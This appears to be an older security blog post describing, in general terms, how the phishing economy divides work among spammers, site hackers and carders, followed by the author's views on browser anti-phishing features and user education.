Lance James is considered to be the foremost expert in Phishing. Having sat on the APWG tech group with him (although I’m sure he couldn’t tell you who I am, which is amusing) and having read his book, I really think there’s a lot more to say about the topic. Now, granted, I used to work for a company that was way more intimately involved in Phishing that his company is, including a lot of things I’d never be able to talk about with him or anyone else for that matter, so I’m not going to hold it against him.
To his credit, he is an expert, and he’s very smart, but he only knows what he’s been exposed to. Let me explain how it actually works, in a real world environment. This is from actual phishers, not from collecting data, mind you. This is fact, not a guess, an estimate or anything I’m speculating on. This is how it actually works:
Firstly, you have to understand Phishing is a business. There are a few big Phishing groups. There’s your Romanians (eastern block traditional phishers), your Nigerians (419 scammers), and your Koreans. That’s of course not everyone, for instance one of the Phishers I was able to interview was actually out of Pakistan.
The next part to understand is that there are actually three totally different types of people who do Phishing who make it all possible. Just like the drug trade, you have farmers, mules, and pushers, in phishing you have similar components. The first is the spammer. To be successful at Phishing you need someone to harvest email addresses (assuming email is your transport mechanism) and to email the users with the Phishing emails in question. They either used hacked machines or hacked connections to send the vast quantities of emails. Blacklisting them doesn’t help much because they just move onto the next machine once they’re done.
The second phisher is the hacker, who actually finds websites to hack. This isn’t implying that the spammer doesn’t hack, it’s just not their primary function. The hacker generally pays the spammer for their lists and to send the bulk emails. The hacker usually buys canned phishing kits off of the web which is generally some PHP scripts and then uses some canned exploit to own a machine. When the machine is properly set up they put their kit online and it either creates a log which they can come and download once in a while or more often it actually emails some anonymous hotmail account with the personal information of the victims. The hacker actually may try other things, like tricky XSS exploits, or installing trojans for future retrival, but thus far this is not the most common route.
The last person in the chain is the carder. The carder buys the personal information from the hacker once it has been validated. This information is then imprinted on a credit card blank. With the blank now imprinted the carder has the tough job of taking the card to an ATM and putting it into the machine. This requires that the machine does not read the first track, but only the second, because information on the second track is phishable, while information on the first track is not generally accessable (or known) by users. Information on tracks are availible here.
This isn’t some high school kids who are just out to make a few bucks. This is in excess of a billion dollar industry, and there are far more technologies in place to monitor and deal with this than most people are aware of. Probablly one of the most interesting is the anti-phishing technology that will be built into IE7.0. Netscape already has anti-phishing blacklists built in which are pulled from Symantec’s blacklists. Firefox is the only one who has not taken a proactive stance against Phishing to date, despite the fact that I’ve talked with them a number of occasions about how they could help fight it. They consider it to be a user’s choice and they can download toolbars to fix this. Honestly, if you make people work to be secure, they won’t be. Only by taking it out of the user’s hands will they have any chance of being secure. Education doesn’t work. You heard it here first. (Actually, it turns out that some people agree.)
As I showed in this rather amusing screenshot, your toolbars are only as good as the developer who built them. Anyway, this is way way way too big a topic to go into in one post, but I’ll make a point on discussing this more in the future, since it is so relevant to the problems people are currently facing today.